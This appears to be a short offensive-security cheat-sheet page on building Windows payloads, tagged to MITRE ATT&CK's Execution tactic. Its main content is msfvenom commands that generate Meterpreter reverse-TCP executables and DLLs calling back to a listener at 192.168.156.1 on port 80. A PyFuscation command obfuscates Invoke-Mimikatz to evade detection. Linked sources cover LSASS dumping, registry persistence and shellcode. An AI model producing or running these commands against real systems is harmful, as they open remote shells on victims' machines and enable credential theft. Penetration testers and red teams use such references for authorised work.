Skip to main content Link Menu Expand (external link) Document Search Copy Copied

pen / win / build

Mitre Att&ck Entreprise: TA0002 - Execution

Menu

msfvenom

pbuild = payload build

#? generate msfvenom payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.156.1 lport=80 -f exe > /tmp/meter-rtcp-192.168.156.1-80.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.156.1 lport=80 -f dll > /tmp/meter-rtcp-192.168.156.1-80.dll

sign

psign = payload sign

obfuscate

# PyFuscation (https://github.com/CBHue/PyFuscation) bring small usefull features
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

sources

*cocomelonc/registry-run-keys *cocomelonc/dump-lsass *cocomelonc/run-shellcode-via-settimer *ired.team/write-shellcode-c *codeproject/write-shellcode-c++ *byt3bl33d3r/OffensiveNim